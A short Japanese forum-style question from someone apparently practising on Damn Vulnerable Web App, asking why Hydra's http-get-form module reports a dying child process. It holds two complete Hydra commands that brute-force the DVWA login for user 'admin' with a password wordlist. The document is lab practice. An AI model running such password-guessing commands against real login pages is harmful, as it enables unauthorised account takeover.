私はHydra(ブルートフォース)をいじって "Damn Vulnerable Web App"のブルートフォースセクションを解決しましたが、問題はhttp-get-form
と言いました:
Warning: child 1 seems to have died, restarting (this only happens if a module is bad)
そして、総当たりコマンドは次のとおりです。
hydra 192.168.100.15 http-get-form \
"/dvwa/vulnerabilities/brute/#:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect" \
-l admin -P /root/Desktop/wordlists/test.txt -w 30
なぜモジュールが悪いのか分かりません。
hydra -l admin -P /root/Desktop/wordlists/test.txt dvwa http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."